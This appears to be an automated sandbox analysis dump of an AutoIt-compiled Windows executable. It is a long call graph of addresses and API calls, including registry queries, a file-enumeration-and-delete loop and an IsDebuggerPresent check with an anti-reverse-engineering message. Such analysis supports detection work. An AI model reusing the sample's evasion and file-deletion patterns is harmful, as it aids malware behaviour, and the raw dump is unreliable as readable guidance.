99504->99478 99505->99494 99507 b41207 59 API calls 99506->99507 99508 b94024 99507->99508 99509 b41207 59 API calls 99508->99509 99510 b9402d 99509->99510 99511 b41207 59 API calls 99510->99511 99512 b94036 99511->99512 99513 b50284 60 API calls 99512->99513 99514 b94041 99513->99514 99515 b94fec GetFileAttributesW 99514->99515 99516 b9404a 99515->99516 99517 b9405c 99516->99517 99518 b41900 59 API calls 99516->99518 99519 b50119 59 API calls 99517->99519 99518->99517 99520 b94070 FindFirstFileW 99519->99520 99521 b940fc FindClose 99520->99521 99524 b9408f 99520->99524 99526 b94107 Mailbox 99521->99526 99522 b940d7 FindNextFileW 99522->99524 99523 b41c9c 59 API calls 99523->99524 99524->99521 99524->99522 99524->99523 99525 b417e0 59 API calls 99524->99525 99527 b41900 59 API calls 99524->99527 99525->99524 99526->99231 99528 b940c8 DeleteFileW 99527->99528 99528->99522 99529 b940f3 FindClose 99528->99529 99529->99526 99530->99142 99531->98422 99532 b3107d 99537 b42fc5 99532->99537 99534 b3108c 99535 b52f70 __cinit 67 API calls 99534->99535 99536 b31096 99535->99536 99538 b42fd5 __ftell_nolock 99537->99538 99539 b41207 59 API calls 99538->99539 99540 b4308b 99539->99540 99568 b500cf 99540->99568 99542 b43094 99575 b508c1 99542->99575 99545 b41900 59 API calls 99546 b430ad 99545->99546 99581 b44c94 99546->99581 99549 b41207 59 API calls 99550 b430c5 99549->99550 99551 b419e1 59 API calls 99550->99551 99552 b430ce RegOpenKeyExW 99551->99552 99553 b801a3 RegQueryValueExW 99552->99553 99557 b430f0 Mailbox 99552->99557 99554 b801c0 99553->99554 99555 b80235 RegCloseKey 99553->99555 99556 b50fe6 Mailbox 59 API calls 99554->99556 99555->99557 99567 b80247 _wcscat Mailbox __wsetenvp 99555->99567 99558 b801d9 99556->99558 99557->99534 99559 b4433f 59 API calls 99558->99559 99560 b801e4 RegQueryValueExW 99559->99560 99562 b80201 99560->99562 99564 b8021b 99560->99564 99561 b41609 59 API calls 99561->99567 99563 b41821 59 API calls 99562->99563 99563->99564 99564->99555 99565 b41a36 59 API calls 99565->99567 99566 b44c94 59 API calls 99566->99567 99567->99557 99567->99561 99567->99565 99567->99566 99569 b61b70 __ftell_nolock 99568->99569 99570 b500dc GetModuleFileNameW 99569->99570 99571 b41a36 59 API calls 99570->99571 99572 b50102 99571->99572 99573 b50284 60 API calls 99572->99573 99574 b5010c Mailbox 99573->99574 99574->99542 99576 b61b70 __ftell_nolock 99575->99576 99577 b508ce GetFullPathNameW 99576->99577 99578 b508f0 99577->99578 99579 b41821 59 API calls 99578->99579 99580 b4309f 99579->99580 99580->99545 99582 b44ca2 99581->99582 99586 b44cc4 _memmove 99581->99586 99584 b50fe6 Mailbox 59 API calls 99582->99584 99583 b50fe6 Mailbox 59 API calls 99585 b430bc 99583->99585 99584->99586 99585->99549 99586->99583 99587 b701f8 99588 b701fa 99587->99588 99591 b94d18 SHGetFolderPathW 99588->99591 99592 b41821 59 API calls 99591->99592 99593 b70203 99592->99593 99594 b992c8 99595 b992d5 99594->99595 99597 b992db 99594->99597 99596 b52f85 _free 58 API calls 99595->99596 99596->99597 99598 b52f85 _free 58 API calls 99597->99598 99600 b992ec 99597->99600 99598->99600 99599 b52f85 _free 58 API calls 99601 b992fe 99599->99601 99600->99599 99600->99601 99602 b36981 99609 b3373a 99602->99609 99604 b36997 99618 b37b3f 99604->99618 99606 b369bf 99607 b3584d 99606->99607 99630 b9a48d 89 API calls 4 library calls 99606->99630 99610 b33746 99609->99610 99611 b33758 99609->99611 99631 b3523c 59 API calls 99610->99631 99613 b33787 99611->99613 99614 b3375e 99611->99614 99632 b3523c 59 API calls 99613->99632 99616 b50fe6 Mailbox 59 API calls 99614->99616 99617 b33750 99616->99617 99617->99604 99619 b4162d 59 API calls 99618->99619 99620 b37b64 _wcscmp 99618->99620 99619->99620 99621 b37b98 Mailbox 99620->99621 99622 b41a36 59 API calls 99620->99622 99621->99606 99623 b6ffad 99622->99623 99624 b417e0 59 API calls 99623->99624 99625 b6ffb8 99624->99625 99633 b33938 68 API calls 99625->99633 99627 b6ffc9 99629 b6ffcd Mailbox 99627->99629 99634 b3523c 59 API calls 99627->99634 99629->99606 99630->99607 99631->99617 99632->99617 99633->99627 99634->99629 99635 b31066 99636 b3106c 99635->99636 99637 b52f70 __cinit 67 API calls 99636->99637 99638 b31076 99637->99638 99639 b6e463 99640 b3373a 59 API calls 99639->99640 99641 b6e479 99640->99641 99642 b6e48f 99641->99642 99643 b6e4fa 99641->99643 99651 b35376 60 API calls 99642->99651 99645 b3b020 299 API calls 99643->99645 99650 b6e4ee Mailbox 99645->99650 99647 b6e4ce 99647->99650 99652 b9890a 59 API calls Mailbox 99647->99652 99648 b6f046 Mailbox 99650->99648 99653 b9a48d 89 API calls 4 library calls 99650->99653 99651->99647 99652->99650 99653->99648 99654 b57e83 99655 b57e8f __getstream 99654->99655 99691 b5a038 GetStartupInfoW 99655->99691 99657 b57e94 99693 b58dac GetProcessHeap 99657->99693 99659 b57eec 99662 b57ef7 99659->99662 99776 b57fd3 58 API calls 3 library calls 99659->99776 99694 b59d16 99662->99694 99663 b57efd 99664 b57f08 __RTC_Initialize 99663->99664 99777 b57fd3 58 API calls 3 library calls 99663->99777 99715 b5d802 99664->99715 99667 b57f17 99668 b57f23 GetCommandLineW 99667->99668 99778 b57fd3 58 API calls 3 library calls 99667->99778 99734 b65153 GetEnvironmentStringsW 99668->99734 99671 b57f22 99671->99668 99674 b57f3d 99675 b57f48 99674->99675 99779 b532e5 58 API calls 3 library calls 99674->99779 99744 b64f88 99675->99744 99678 b57f4e 99679 b57f59 99678->99679 99780 b532e5 58 API calls 3 library calls 99678->99780 99758 b5331f 99679->99758 99682 b57f61 99683 b57f6c __wwincmdln 99682->99683 99781 b532e5 58 API calls 3 library calls 99682->99781 99764 b45f8b 99683->99764 99686 b57f80 99687 b57f8f 99686->99687 99782 b53588 58 API calls _doexit 99686->99782 99783 b53310 58 API calls _doexit 99687->99783 99690 b57f94 __getstream 99692 b5a04e 99691->99692 99692->99657 99693->99659 99784 b533b7 36 API calls 2 library calls 99694->99784 99696 b59d1b 99785 b59f6c InitializeCriticalSectionAndSpinCount __getstream 99696->99785 99698 b59d20 99699 b59d24 99698->99699 99787 b59fba TlsAlloc 99698->99787 99786 b59d8c 61 API calls 2 library calls 99699->99786 99702 b59d29 99702->99663 99703 b59d36 99703->99699 99704 b59d41 99703->99704 99788 b58a05 99704->99788 99707 b59d83 99796 b59d8c 61 API calls 2 library calls 99707->99796 99710 b59d62 99710->99707 99712 b59d68 99710->99712 99711 b59d88 99711->99663 99795 b59c63 58 API calls 4 library calls 99712->99795 99714 b59d70 GetCurrentThreadId 99714->99663 99716 b5d80e __getstream 99715->99716 99717 b59e3b __lock 58 API calls 99716->99717 99718 b5d815 99717->99718 99719 b58a05 __calloc_crt 58 API calls 99718->99719 99722 b5d826 99719->99722 99720 b5d831 @_EH4_CallFilterFunc@8 __getstream 99720->99667 99721 b5d891 GetStartupInfoW 99727 b5d8a6 99721->99727 99729 b5d9d5 99721->99729 99722->99720 99722->99721 99723 b5da9d 99810 b5daad LeaveCriticalSection _doexit 99723->99810 99725 b58a05 __calloc_crt 58 API calls 99725->99727 99726 b5da22 GetStdHandle 99726->99729 99727->99725 99727->99729 99730 b5d8f4 99727->99730 99728 b5da35 GetFileType 99728->99729 99729->99723 99729->99726 99729->99728 99809 b5a05b InitializeCriticalSectionAndSpinCount 99729->99809 99730->99729 99731 b5d928 GetFileType 99730->99731 99808 b5a05b InitializeCriticalSectionAndSpinCount 99730->99808 99731->99730 99735 b65164 99734->99735 99736 b57f33 99734->99736 99811 b58a4d 58 API calls 2 library calls 99735->99811 99740 b64d4b GetModuleFileNameW 99736->99740 99738 b6518a _memmove 99739 b651a0 FreeEnvironmentStringsW 99738->99739 99739->99736 99741 b64d7f _wparse_cmdline 99740->99741 99743 b64dbf _wparse_cmdline 99741->99743 99812 b58a4d 58 API calls 2 library calls 99741->99812 99743->99674 99745 b64f99 99744->99745 99746 b64fa1 __wsetenvp 99744->99746 99745->99678 99747 b58a05 __calloc_crt 58 API calls 99746->99747 99754 b64fca __wsetenvp 99747->99754 99748 b65021 99749 b52f85 _free 58 API calls 99748->99749 99749->99745 99750 b58a05 __calloc_crt 58 API calls 99750->99754 99751 b65046 99753 b52f85 _free 58 API calls 99751->99753 99753->99745 99754->99745 99754->99748 99754->99750 99754->99751 99755 b6505d 99754->99755 99813 b64837 58 API calls 2 library calls 99754->99813 99814 b58ff6 IsProcessorFeaturePresent 99755->99814 99757 b65069 99757->99678 99759 b5332b __IsNonwritableInCurrentImage 99758->99759 99837 b5a701 99759->99837 99761 b53349 __initterm_e 99762 b52f70 __cinit 67 API calls 99761->99762 99763 b53368 __cinit __IsNonwritableInCurrentImage 99761->99763 99762->99763 99763->99682 99765 b45fa5 99764->99765 99766 b46044 99764->99766 99767 b45fdf IsThemeActive 99765->99767 99766->99686 99840 b5359c 99767->99840 99771 b4600b 99852 b45f00 SystemParametersInfoW SystemParametersInfoW 99771->99852 99773 b46017 99853 b45240 99773->99853 99775 b4601f SystemParametersInfoW 99775->99766 99776->99662 99777->99664 99778->99671 99782->99687 99783->99690 99784->99696 99785->99698 99786->99702 99787->99703 99789 b58a0c 99788->99789 99791 b58a47 99789->99791 99793 b58a2a 99789->99793 99797 b65426 99789->99797 99791->99707 99794 b5a016 TlsSetValue 99791->99794 99793->99789 99793->99791 99805 b5a362 Sleep 99793->99805 99794->99710 99795->99714 99796->99711 99798 b65431 99797->99798 99803 b6544c 99797->99803 99799 b6543d 99798->99799 99798->99803 99806 b58d58 58 API calls __getptd_noexit 99799->99806 99801 b6545c HeapAlloc 99802 b65442 99801->99802 99801->99803 99802->99789 99803->99801 99803->99802 99807 b535d1 DecodePointer 99803->99807 99805->99793 99806->99802 99807->99803 99808->99730 99809->99729 99810->99720 99811->99738 99812->99743 99813->99754 99815 b59001 99814->99815 99820 b58e89 99815->99820 99819 b5901c 99819->99757 99821 b58ea3 _memset ___raise_securityfailure 99820->99821 99822 b58ec3 IsDebuggerPresent 99821->99822 99828 b5a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99822->99828 99825 b58faa 99827 b5a370 GetCurrentProcess TerminateProcess 99825->99827 99826 b58f87 ___raise_securityfailure 99829 b5c826 99826->99829 99827->99819 99828->99826 99830 b5c830 IsProcessorFeaturePresent 99829->99830 99831 b5c82e 99829->99831 99833 b65b3a 99830->99833 99831->99825 99836 b65ae9 5 API calls ___raise_securityfailure 99833->99836 99835 b65c1d 99835->99825 99836->99835 99838 b5a704 EncodePointer 99837->99838 99838->99838 99839 b5a71e 99838->99839 99839->99761 99841 b59e3b __lock 58 API calls 99840->99841 99842 b535a7 DecodePointer EncodePointer 99841->99842 99905 b59fa5 LeaveCriticalSection 99842->99905 99844 b46004 99845 b53604 99844->99845 99846 b53628 99845->99846 99847 b5360e 99845->99847 99846->99771 99847->99846 99906 b58d58 58 API calls __getptd_noexit 99847->99906 99849 b53618 99907 b58fe6 9 API calls _fseek 99849->99907 99851 b53623 99851->99771 99852->99773 99854 b4524d __ftell_nolock 99853->99854 99855 b41207 59 API calls 99854->99855 99856 b45258 GetCurrentDirectoryW 99855->99856 99908 b44ec8 99856->99908 99858 b4527e IsDebuggerPresent 99859 b4528c 99858->99859 99860 b80b21 MessageBoxA 99858->99860 99861 b80b39 99859->99861 99862 b452a0 99859->99862 99860->99861 100016 b4314d 59 API calls Mailbox 99861->100016 99976 b431bf 99862->99976 99866 b80b49 99873 b80b5f SetCurrentDirectoryW 99866->99873 99872 b4536c Mailbox 99872->99775 99873->99872 99905->99844 99906->99849 99907->99851 99909 b41207 59 API calls 99908->99909 99910 b44ede 99909->99910 100018 b45420 99910->100018 99912 b44efc 99913 b419e1 59 API calls 99912->99913 99914 b44f10 99913->99914 99915 b41c9c 59 API calls 99914->99915 99916 b44f1b 99915->99916 100032 b3477a 99916->100032 99919 b41a36 59 API calls 99920 b44f34 99919->99920 99921 b339be 68 API calls 99920->99921 99922 b44f44 Mailbox 99921->99922 99923 b41a36 59 API calls 99922->99923 99924 b44f68 99923->99924 99925 b339be 68 API calls 99924->99925 99926 b44f77 Mailbox 99925->99926 99927 b41207 59 API calls 99926->99927 99928 b44f94 99927->99928 100035 b455bc 99928->100035 99931 b5312d _W_store_winword 60 API calls 99932 b44fae 99931->99932 99933 b80a54 99932->99933 99934 b44fb8 99932->99934 99935 b455bc 59 API calls 99933->99935 99936 b5312d _W_store_winword 60 API calls 99934->99936 99937 b80a68 99935->99937 99938 b44fc3 99936->99938 99940 b455bc 59 API calls 99937->99940 99938->99937 99939 b44fcd 99938->99939 99941 b5312d _W_store_winword 60 API calls 99939->99941 99942 b80a84 99940->99942 99943 b44fd8 99941->99943 99945 b500cf 61 API calls 99942->99945 99943->99942 99944 b44fe2 99943->99944 99946 b5312d _W_store_winword 60 API calls 99944->99946 99947 b80aa7 99945->99947 99948 b44fed 99946->99948 99949 b455bc 59 API calls 99947->99949 99952 b44ff7 99948->99952 99965 b80ad0 99948->99965 99951 b80ab3 99949->99951 99950 b455bc 59 API calls 99954 b80aee 99950->99954 99955 b41c9c 59 API calls 99951->99955 99953 b4501b 99952->99953 99956 b41c9c 59 API calls 99952->99956 99958 b347be 59 API calls 99953->99958 99959 b41c9c 59 API calls 99954->99959 99960 b80ac1 99955->99960 99957 b4500e 99956->99957 99962 b455bc 59 API calls 99957->99962 99963 b4502a 99958->99963 99964 b80afc 99959->99964 99961 b455bc 59 API calls 99960->99961 99961->99965 99962->99953 99966 b34540 59 API calls 99963->99966 99967 b455bc 59 API calls 99964->99967 99965->99950 99968 b45038 99966->99968 99969 b80b0b 99967->99969 100041 b343d0 99968->100041 99969->99969 99971 b3477a 59 API calls 99973 b45055 99971->99973 99972 b343d0 59 API calls 99972->99973 99973->99971 99973->99972 99974 b455bc 59 API calls 99973->99974 99975 b4509b Mailbox 99973->99975 99974->99973 99975->99858 99977 b431cc __ftell_nolock 99976->99977 99978 b431e5 99977->99978 99979 b80314 _memset 99977->99979 99980 b50284 60 API calls 99978->99980 99982 b80330 GetOpenFileNameW 99979->99982 99981 b431ee 99980->99981 100052 b509c5 99981->100052 99984 b8037f 99982->99984 99985 b41821 59 API calls 99984->99985 99987 b80394 99985->99987 99987->99987 99989 b43203 100070 b4278a 99989->100070 100016->99866 100019 b4542d __ftell_nolock 100018->100019 100020 b41821 59 API calls 100019->100020 100022 b45590 Mailbox 100019->100022 100023 b4545f 100020->100023 100021 b41609 59 API calls 100021->100023 100022->99912 100023->100021 100031 b45495 Mailbox 100023->100031 100024 b41609 59 API calls 100024->100031 100025 b45563 100025->100022 100026 b41a36 59 API calls 100025->100026 100027 b45584 100026->100027 100029 b44c94 59 API calls 100027->100029 100028 b41a36 59 API calls 100028->100031 100029->100022 100030 b44c94 59 API calls 100030->100031 100031->100022 100031->100024 100031->100025 100031->100028 100031->100030 100033 b50fe6 Mailbox 59 API calls 100032->100033 100034 b34787 100033->100034 100034->99919 100036 b455c6 100035->100036 100037 b455df 100035->100037 100038 b41c9c 59 API calls 100036->100038 100039 b41821 59 API calls 100037->100039 100040 b44fa0 100038->100040 100039->100040 100040->99931 100042 b6d6c9 100041->100042 100044 b343e7 100041->100044 100042->100044 100051 b340cb 59 API calls Mailbox 100042->100051 100045 b34530 100044->100045 100046 b344e8 100044->100046 100049 b344ef 100044->100049 100050 b3523c 59 API calls 100045->100050 100048 b50fe6 Mailbox 59 API calls 100046->100048 100048->100049 100049->99973 100050->100049 100051->100044 100053 b61b70 __ftell_nolock 100052->100053 100054 b509d2 GetLongPathNameW 100053->100054 100055 b41821 59 API calls 100054->100055 100056 b431f7 100055->100056 100057 b42f3d 100056->100057 100058 b41207 59 API calls 100057->100058 100059 b42f4f 100058->100059 100060 b50284 60 API calls 100059->100060 100061 b42f5a 100060->100061 100062 b42f65 100061->100062 100065 b80177 100061->100065 100064 b44c94 59 API calls 100062->100064 100063 b4151f 61 API calls 100063->100065 100066 b42f71 100064->100066 100065->100063 100068 b80191 100065->100068 100104 b31307 100066->100104 100069 b42f84 Mailbox 100069->99989 100110 b449c2 100070->100110 100073 b7f8d6 100075 b449c2 136 API calls 100105 b31319 100104->100105 100109 b31338 _memmove 100104->100109 100107 b50fe6 Mailbox 59 API calls 100105->100107 100106 b50fe6 Mailbox 59 API calls 100108 b3134f 100106->100108 100107->100109 100108->100069 100109->100106 100294 b44b29 100110->100294 100115 b808bb 100118 b44a2f 84 API calls 100115->100118 100116 b449ed LoadLibraryExW 100304 b44ade 100116->100304 100120 b808c2 100118->100120 100122 b44ade 3 API calls 100120->100122 100124 b808ca 100122->100124 100123 b44a14 100123->100124 100125 b44a20 100123->100125 100330 b44ab2 100124->100330 100126 b44a2f 84 API calls 100125->100126 100129 b427af 100126->100129 100129->100073 100129->100075 100131 b808f1 100338 b44a6e 100131->100338 100343 b44b77 100294->100343 100297 b44b77 2 API calls 100300 b44b50 100297->100300 100298 b44b60 FreeLibrary 100299 b449d4 100298->100299 100301 b5547b 100299->100301 100300->100298 100300->100299 100347 b55490 100301->100347 100303 b449e1 100303->100115 100303->100116 100428 b44baa 100304->100428 100307 b44b03 100309 b44b15 FreeLibrary 100307->100309 100310 b44a05 100307->100310 100308 b44baa 2 API calls 100308->100307 100309->100310 100311 b448b0 100310->100311 100312 b50fe6 Mailbox 59 API calls 100311->100312 100313 b448c5 100312->100313 100314 b4433f 59 API calls 100313->100314 100315 b448d1 _memmove 100314->100315 100316 b8080a 100315->100316 100317 b4490c 100315->100317 100319 b80817 100316->100319 100437 b99ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100316->100437 100318 b44a6e 69 API calls 100317->100318 100322 b44915 100318->100322 100438 b99f5e 95 API calls 100319->100438 100323 b80859 100322->100323 100324 b44ab2 74 API calls 100322->100324 100325 b449a0 100322->100325 100328 b44a8c 85 API calls 100322->100328 100432 b44a8c 100323->100432 100324->100322 100325->100123 100328->100322 100331 b44ac4 100330->100331 100332 b80945 100330->100332 100544 b55802 100331->100544 100335 b996c4 100669 b9951a 100335->100669 100337 b996da 100337->100131 100339 b80908 100338->100339 100344 b44b44 100343->100344 100345 b44b80 LoadLibraryA 100343->100345 100344->100297 100344->100300 100345->100344 100346 b44b91 GetProcAddress 100345->100346 100346->100344 100350 b5549c __getstream 100347->100350 100348 b554af 100396 b58d58 58 API calls __getptd_noexit 100348->100396 100350->100348 100352 b554e0 100350->100352 100351 b554b4 100397 b58fe6 9 API calls _fseek 100351->100397 100366 b60718 100352->100366 100355 b554e5 100356 b554ee 100355->100356 100357 b554fb 100355->100357 100398 b58d58 58 API calls __getptd_noexit 100356->100398 100358 b55525 100357->100358 100359 b55505 100357->100359 100381 b60837 100358->100381 100399 b58d58 58 API calls __getptd_noexit 100359->100399 100365 b554bf @_EH4_CallFilterFunc@8 __getstream 100365->100303 100367 b60724 __getstream 100366->100367 100368 b59e3b __lock 58 API calls 100367->100368 100379 b60732 100368->100379 100369 b607a6 100401 b6082e 100369->100401 100370 b607ad 100406 b58a4d 58 API calls 2 library calls 100370->100406 100373 b60823 __getstream 100373->100355 100374 b607b4 100374->100369 100407 b5a05b InitializeCriticalSectionAndSpinCount 100374->100407 100377 b59ec3 __mtinitlocknum 58 API calls 100377->100379 100378 b607da EnterCriticalSection 100378->100369 100379->100369 100379->100370 100379->100377 100404 b56e7d 59 API calls __lock 100379->100404 100405 b56ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100379->100405 100389 b60857 __wopenfile 100381->100389 100382 b60871 100412 b58d58 58 API calls __getptd_noexit 100382->100412 100384 b60876 100413 b58fe6 9 API calls _fseek 100384->100413 100386 b60a8f 100409 b687d1 100386->100409 100387 b55530 100400 b55552 LeaveCriticalSection LeaveCriticalSection _fprintf 100387->100400 100389->100382 100395 b60a2c 100389->100395 100414 b539fb 60 API calls 3 library calls 100389->100414 100391 b60a25 100391->100395 100415 b539fb 60 API calls 3 library calls 100391->100415 100393 b60a44 100393->100395 100416 b539fb 60 API calls 3 library calls 100393->100416 100395->100382 100395->100386 100396->100351 100397->100365 100398->100365 100399->100365 100400->100365 100408 b59fa5 LeaveCriticalSection 100401->100408 100403 b60835 100403->100373 100404->100379 100405->100379 100406->100374 100407->100378 100408->100403 100417 b67fb5 100409->100417 100411 b687ea 100411->100387 100412->100384 100413->100387 100414->100391 100415->100393 100416->100395 100418 b67fc1 __getstream 100417->100418 100419 b67fd7 100418->100419 100421 b6800d 100418->100421 100420 b58d58 __free_osfhnd 58 API calls 100419->100420 100422 b67fdc 100420->100422 100423 b6807e __wsopen_nolock 109 API calls 100421->100423 100424 b58fe6 _fseek 9 API calls 100422->100424 100425 b68029 100423->100425 100427 b67fe6 __getstream 100424->100427 100426 b68052 __wsopen_helper LeaveCriticalSection 100425->100426 100426->100427 100427->100411 100429 b44af7 100428->100429 100430 b44bb3 LoadLibraryA 100428->100430 100429->100307 100429->100308 100430->100429 100431 b44bc4 GetProcAddress 100430->100431 100431->100429 100433 b80923 100432->100433 100434 b44a9b 100432->100434 100439 b55a6d 100434->100439 100437->100319 100438->100322 100440 b55a79 __getstream 100439->100440 100441 b55a8b 100440->100441 100443 b55ab1 100440->100443 100547 b5581d 100544->100547 100546 b44ad5 100546->100335 100548 b55829 __getstream 100547->100548 100549 b5586c 100548->100549 100550 b5583f _memset 100548->100550 100551 b55864 __getstream 100548->100551 100552 b56e3e __lock_file 59 API calls 100549->100552 100574 b58d58 58 API calls __getptd_noexit 100550->100574 100551->100546 100554 b55872 100552->100554 100560 b5563d 100554->100560 100555 b55859 100575 b58fe6 9 API calls _fseek 100555->100575 100564 b55658 _memset 100560->100564 100566 b55673 100560->100566 100561 b55663 100665 b58d58 58 API calls __getptd_noexit 100561->100665 100563 b55668 100666 b58fe6 9 API calls _fseek 100563->100666 100564->100561 100564->100566 100571 b556b3 100564->100571 100576 b558a6 LeaveCriticalSection LeaveCriticalSection _fprintf 100566->100576 100568 b557c4 _memset 100668 b58d58 58 API calls __getptd_noexit 100568->100668 100569 b54906 __fseek_nolock 58 API calls 100569->100571 100571->100566 100571->100568 100571->100569 100577 b6108b 100571->100577 100645 b60dd7 100571->100645 100667 b60ef8 58 API calls 4 library calls 100571->100667 100574->100555 100575->100551 100576->100551 100578 b610c3 100577->100578 100579 b610ac 100577->100579 100581 b617fb 100578->100581 100585 b610fd 100578->100585 100580 b58d24 __free_osfhnd 58 API calls 100579->100580 100582 b610b1 100580->100582 100583 b58d24 __free_osfhnd 58 API calls 100581->100583 100587 b61105 100585->100587 100594 b6111c 100585->100594 100646 b60df7 100645->100646 100647 b60de2 100645->100647 100651 b60e2c 100646->100651 100652 b66214 __getbuf 58 API calls 100646->100652 100659 b60df2 100646->100659 100648 b58d58 __free_osfhnd 58 API calls 100647->100648 100649 b60de7 100648->100649 100653 b54906 __fseek_nolock 58 API calls 100651->100653 100652->100651 100659->100571 100665->100563 100666->100566 100667->100571 100668->100563 100672 b5542a GetSystemTimeAsFileTime 100669->100672 100671 b99529 100671->100337 100673 b55458 __aulldiv 100672->100673 100673->100671 100850 b44d83 100851 b44dba 100850->100851 100852 b44e37 100851->100852 100853 b44dd8 100851->100853 100889 b44e35 100851->100889 100855 b44e3d 100852->100855 100856 b809c2 100852->100856 100857 b44de5 100853->100857 100858 b44ead PostQuitMessage 100853->100858 100854 b44e1a DefWindowProcW 100892 b44e28 100854->100892 100859 b44e65 SetTimer RegisterWindowMessageW 100855->100859 100860 b44e42 100855->100860 100905 b3c460 10 API calls Mailbox 100856->100905 100861 b44df0 100857->100861 100862 b80a35 100857->100862 100858->100892 100866 b44e8e CreatePopupMenu 100859->100866 100859->100892 100864 b80965 100860->100864 100865 b44e49 KillTimer 100860->100865 100867 b44eb7 100861->100867 100868 b44df8 100861->100868 100908 b92cce 97 API calls _memset 100862->100908 100872 b8096a 100864->100872 100873 b8099e MoveWindow 100864->100873 100874 b45ac3 Shell_NotifyIconW 100865->100874 100866->100892 100895 b45b29 100867->100895 100875 b80a1a 100868->100875 100876 b44e03 100868->100876 100870 b809e9 100906 b3c483 299 API calls Mailbox 100870->100906 100879 b8098d SetFocus 100872->100879 100880 b8096e 100872->100880 100873->100892 100881 b44e5c 100874->100881 100875->100854 100907 b88854 59 API calls Mailbox 100875->100907 100882 b44e9b 100876->100882 100883 b44e0e 100876->100883 100877 b80a47 100877->100854 100877->100892 100879->100892 100880->100883 100884 b80977 100880->100884 100902 b334e4 DeleteObject DestroyWindow Mailbox 100881->100902 100903 b45bd7 107 API calls _memset 100882->100903 100883->100854 100891 b45ac3 Shell_NotifyIconW 100883->100891 100904 b3c460 10 API calls Mailbox 100884->100904 100889->100854 100890 b44eab 100890->100892 100893 b80a0e 100891->100893 100894 b459d3 94 API calls 100893->100894 100894->100889 100896 b45b40 _memset 100895->100896 100897 b45bc2 100895->100897 100898 b456f8 87 API calls 100896->100898 100897->100892 100900 b45b67 100898->100900 100899 b45bab KillTimer SetTimer 100899->100897 100900->100899 100901 b80d6e Shell_NotifyIconW 100900->100901 100901->100899 100902->100892 100903->100890 100904->100892 100905->100870 100906->100883 100907->100889 100908->100877 100909 b3ac2a 100910 b3ac2f 100909->100910 100911 b41207 59 API calls 100910->100911 100912 b3ac39 100911->100912 100930 b50588 100912->100930 100916 b3ac6b 100917 b41207 59 API calls 100916->100917 100918 b3ac75 100917->100918 100958 b4fe2b 100918->100958 100920 b3acbc 100921 b3accc GetStdHandle 100920->100921 100922 b3ad18 100921->100922 100923 b72f39 100921->100923 100925 b3ad20 OleInitialize 100922->100925 100923->100922 100924 b72f42 100923->100924 100965 b970f3 64 API calls Mailbox 100924->100965 100927 b72f49 100966 b977c2 CreateThread 100927->100966 100929 b72f55 CloseHandle 100929->100925 100931 b41207 59 API calls 100930->100931 100932 b50598 100931->100932 100933 b41207 59 API calls 100932->100933 100934 b505a0 100933->100934 100967 b410c3 100934->100967 100937 b410c3 59 API calls 100938 b505b0 100937->100938 100939 b41207 59 API calls 100938->100939 100940 b505bb 100939->100940 100941 b50fe6 Mailbox 59 API calls 100940->100941 100942 b3ac43 100941->100942 100943 b4ff4c 100942->100943 100944 b4ff5a 100943->100944 100945 b41207 59 API calls 100944->100945 100946 b4ff65 100945->100946 100947 b41207 59 API calls 100946->100947 100948 b4ff70 100947->100948 100949 b41207 59 API calls 100948->100949 100950 b4ff7b 100949->100950 100951 b41207 59 API calls 100950->100951 100952 b4ff86 100951->100952 100953 b410c3 59 API calls 100952->100953 100954 b4ff91 100953->100954 100955 b50fe6 Mailbox 59 API calls 100954->100955 100956 b4ff98 RegisterWindowMessageW 100955->100956 100956->100916 100959 b8620c 100958->100959 100960 b4fe3b 100958->100960 100970 b9a12a 59 API calls 100959->100970 100961 b50fe6 Mailbox 59 API calls 100960->100961 100963 b4fe43 100961->100963 100963->100920 100964 b86217 100965->100927 100966->100929 100968 b41207 59 API calls 100967->100968 100969 b410cb 100968->100969 100969->100937 100970->100964 100971 b39a88 100974 b386e0 100971->100974 100975 b386fd 100974->100975 100976 b70fad 100975->100976 100977 b70ff8 100975->100977 101001 b38724 100975->101001 100980 b70fb5 100976->100980 100983 b70fc2 100976->100983 100976->101001 101009 baaad0 299 API calls __cinit 100977->101009 100978 b35278 59 API calls 100978->101001 101007 bab0e4 299 API calls 100980->101007 100982 b52f70 __cinit 67 API calls 100982->101001 100998 b3898d 100983->100998 101008 bab58c 299 API calls 3 library calls 100983->101008 100986 b71289 100986->100986 100987 b33c30 68 API calls 100987->101001 100988 b711af 101012 baae3b 89 API calls 100988->101012 100990 b33f42 68 API calls 100990->101001 100992 b38a17 100993 b339be 68 API calls 100993->101001 100998->100992 101013 b9a48d 89 API calls 4 library calls 100998->101013 100999 b353b0 299 API calls 100999->101001 101000 b41c9c 59 API calls 101000->101001 101001->100978 101001->100982 101001->100987 101001->100988 101001->100990 101001->100992 101001->100993 101001->100998 101001->100999 101001->101000 101003 b33938 68 API calls 101001->101003 101004 b3855e 299 API calls 101001->101004 101005 b384e2 89 API calls 101001->101005 101006 b3835f 299 API calls 101001->101006 101010 b3523c 59 API calls 101001->101010 101011 b873ab 59 API calls 101001->101011 101003->101001 101004->101001 101005->101001 101006->101001 101007->100983 101008->100998 101009->101001 101010->101001 101011->101001 101012->100998 101013->100986 101014 b39a6c 101017 b3829c 101014->101017 101016 b39a78 101018 b382b4 101017->101018 101019 b38308 101017->101019 101018->101019 101020 b353b0 299 API calls 101018->101020 101024 b38331 101019->101024 101027 b9a48d 89 API calls 4 library calls 101019->101027 101023 b382eb 101020->101023 101022 b70ed8 101022->101022 101023->101024 101026 b3523c 59 API calls 101023->101026 101024->101016 101026->101019 101027->101022

                                              Executed Functions

                                              Function 00B45240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B4526C
                                              • IsDebuggerPresent.KERNEL32 ref: 00B4527E
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B452E6
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B3BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B3BC07
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B45366
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B80B2E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80B66
